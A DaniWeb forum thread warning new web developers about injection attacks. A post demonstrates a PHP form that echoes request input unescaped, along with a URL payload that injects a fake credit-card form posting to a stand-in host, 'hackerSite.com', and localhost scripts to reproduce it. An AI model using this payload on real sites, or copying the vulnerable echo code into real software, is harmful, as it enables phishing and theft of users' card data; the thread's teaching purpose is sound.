3
Contributors
3
Replies
30
Views
3 Years
Discussion Span
Last Post by veedeoo
0

I totally agree with GliderPilot. Most hackers are not really interested in breaking the target site. What they really after for is to steal information from the user.

Allow me to give you the very basic example and vulnerability demonstration of the form.

Let say, we have a form on our site. I will be using the weakest type of form implementation I have ever from askers here on daniweb. Something like this

<form action="hackme.php" method="request">
     <label>Type Your Name</label>
     <input type="text" name="name">
     <br/>
     <textarea name="comment"></textarea>
     <br/>
     <input type="submit" name="submit" value="submit"/>
     </form>

and the form processor for the above for is written like this...

    if(isset($_REQUEST['submit'])){

        echo $_REQUEST['name'];
        echo '<br/>';
        echo $_REQUEST['comment'].'<br/>';

        }

The hacker will visit your site and look at the html source of your form page. He will be able to get the information of your form processor hackme.php and the type of action used request.

The hacker will then test if your site can be injected by pasting this to the browser.

http://yourdomain.com/hackme.php?name=hello  Client <br/>Please Enter Your Credit Card Below<br/>&comment=<form action=http://hackerSite.com/gotcha.php method=post><br/><input type=text name=cc><br/><input type=submit name=submit value=submit>&submit=submit

The hacker will then check if the form injected on your form will be shown on the page. If it does, they generate links to your site's form processors. The unsuspecting users will then type in their info. and the injected form will be process on the hacker's site.

Try this on your localhost. Create a file name hack.php and paste the codes below

<?php 

$form = '<form action="hack.php" method="request">
         <label>Type Your Name</label>
         <input type="text" name="name">
         <br/>
         <textarea name="comment"></textarea>
         <br/>
         <input type="submit" name="submit" value="submit"/>
         </form>';

if(isset($_REQUEST['submit'])){

        echo $_REQUEST['name'];
        echo '<br/>';
        echo $_REQUEST['comment'].'<br/>';

        }

        else{
        echo $form;
        }

Create another file called hacked.php and paste codes below

<?php

    if(isset($_POST['submit'])){

     echo $_POST['cc'].'<br/>';

     }

Open your favorite browser and paste the injection codes below.

localhost/hack.php?name=hello  Client <br/>Please Enter Your Credit Card Below<br/>&comment=<form action='localhost/hacked.php' method=post><br/><input type=text name=cc><br/><input type=submit name=submit value=submit>&submit=submit

Hit enter, the hack.ph page should create the injected form asking for credit card number. Now type any number on the input and hit submit. That should take you to the hacked.php.

Example above is pretty classic, but any unsuspecting new web developer can easily overlook this type of vulnerability.

Edited by veedeoo: info added.

0

I just want to add that my demonstration will work even on upload form. So, be careful if your site is allowing users to upload. You need to screen those files if they are allowed or not. Otherwise, malicious scripts can be uploaded to your site.

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.